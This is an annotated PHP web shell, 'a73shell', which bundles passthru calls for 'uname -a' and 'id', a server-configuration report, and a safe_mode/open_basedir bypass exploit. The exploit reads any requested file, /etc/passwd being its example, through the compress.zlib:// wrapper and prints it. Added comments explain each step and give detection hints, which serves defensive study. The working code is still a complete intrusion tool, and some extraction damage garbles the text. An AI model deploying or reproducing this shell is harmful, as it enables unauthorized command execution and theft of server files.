|
j a73shell
v.0
Bypass |
Arab Security Center
Team
2005-2006
October73 Coded
By:Super-Crystal
|
uname -a:
passthru("uname -a");?>
ID:
passthru("id");?>
Dir:
echo getcwd();?> |
SOFTWARE:
passthru("uname -a");?>
Safe-mode:
|
Arab4Services.Com
mail: ooloo605@hotmail.com
Safe Mode
Shell";
// Environment-report section of a PHP web shell (the page's own banner calls it
// "a73shell ... Bypass"). Everything from here to the final echo only reads
// configuration and prints it; no file is touched until the copy() step later.
// Defender note: a single script that prints safe_mode, open_basedir,
// disable_functions and the available DB extensions together is a useful
// content fingerprint when sweeping a web root for dropped shells.
//
// $tymczas is the scratch directory later handed to tempnam(); the author's
// note asks for a directory with mode 777. The wrapped tail of that note on the
// following line is extraction damage and is kept exactly as found.
$tymczas="./"; // Set $tymczas to dir where you have 777
like /var/tmp
// Report the safe_mode setting. safe_mode was deprecated in PHP 5.3 and removed
// in 5.4, so on current PHP ini_get() finds no such directive and the script
// reports "OFF".
// The "(secure)" label is the shell author's wording; safe_mode was never a
// reliable isolation boundary, which is the premise of this page.
if (@ini_get("safe_mode") or
strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "ON
(secure)";
}
else {$safemode = false; $hsafemode = "OFF (not secure)";}
echo("Safe-mode: $hsafemode");
// Report open_basedir. Any non-empty value is treated as "enabled" and the raw
// directive value (the allowed path list) is echoed back to the requester.
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true;
$hopenbasedir = "".$v."";}
else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}
echo("
");
echo("Open base dir: $hopenbasedir");
echo("
");
// Probe which database client extensions are compiled in, by checking whether
// their connect functions exist. Nothing is connected to here.
echo "PostgreSQL: ";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "ON";}else{echo
"OFF";}
echo("
");
echo "MSSQL: ";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "ON";}else{echo
"OFF";}
echo("
");
echo "MySQL: ";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "ON";
} else { echo "OFF"; }
echo("
");
// Discloses the exact interpreter version to the requester.
echo "PHP version:
".@phpversion()."";
echo("
");
// NOTE(review): $curl_on is not assigned anywhere in the visible code, so this
// row prints "OFF" unless the variable is set outside this excerpt.
echo "cURL: ".(($curl_on)?("ON"):("OFF"));
echo("
");
// Prints the disable_functions list verbatim, or "NONE" when it is empty.
// For a defender this row shows what hardening an intruder can see; see the
// file-read step later on the page, which uses none of the command-execution
// functions that list usually targets.
echo "Disable functions : ";
if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo
"$df";}
// Disk statistics. NOTE(review): $dir is not assigned in the visible code, so
// both calls receive an undefined value as shown; failures fall back to 0.
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
// This expression divides by zero whenever $free or $all is 0 (both are forced
// to 0 above on failure). Neither $used nor $used_percent is printed in the
// visible code.
$used_percent = @round(100/($all/$free),2);
echo "\n";
// Target selection. $file is used as-is when already set; otherwise it is taken
// from the "file" query-string parameter, and failing that from a POSTed "file"
// field. The value is not validated, normalised or restricted in any way before
// it reaches copy() further down.
// NOTE(review): nothing visible assigns $file before this point, so the first
// branch presumably relies on the script being edited (as the usage text says)
// or on register_globals - confirm against the full file.
// Defender note: because GET is accepted, requested paths land in the web
// server access log; POSTed values normally do not, so body logging or a WAF
// rule is needed to see those.
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file
POST, GET like
?file=/etc/passwd\n Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
Exploit");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}
// File-read step. The usage text on this page names PHP 4.4.2 and 5.1.2 as the
// affected versions; the root cause is not stated here. Presumably copy() with
// a compress.zlib:// source was not subject to the safe_mode/open_basedir check
// on those releases - confirm against the vendor advisory.
//
// Defender notes:
//  - Only tempnam(), copy(), fopen(), fread(), fclose() and unlink() are used,
//    so a disable_functions list aimed at command execution (the passthru()
//    calls in the banner above) does not affect this path.
//  - Durable mitigation is a supported PHP release plus OS-level isolation
//    (file permissions, per-site users) rather than PHP-level path settings.
//  - Hunting: a stream-wrapper prefix concatenated with request data, and
//    short-lived files with the "cx" prefix in world-writable directories.

// Create a uniquely named temp file (prefix "cx") in the $tymczas directory.
$temp=tempnam($tymczas, "cx");
// Copy the requested path, read through the zlib stream wrapper, into the temp
// file. On failure the else branch below reports a generic error.
if(copy("compress.zlib://".$file, $temp)){
// Read the whole temp copy back into memory.
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
// Print the file name and contents to the requester. Both pass through
// htmlspecialchars(), so the response carries the data HTML-escaped.
echo "--- Start File
".htmlspecialchars($file)."
-------------\n".htmlspecialchars($tekst)."\n<
;B>--- End File
".htmlspecialchars($file)." ---------------\n";
// The temp copy is deleted right after being read, so the on-disk artefact
// only exists for the duration of the request.
unlink($temp);
die("\nFile
".htmlspecialchars($file)." has been already loaded.
SecurityReason Team
;]");
} else {
// copy() failed: the script stops with one message and does not distinguish
// between a missing path and a denied one.
die("Sorry...
File
".htmlspecialchars($file)." dosen't
exists or you don't have
access.");
}
?>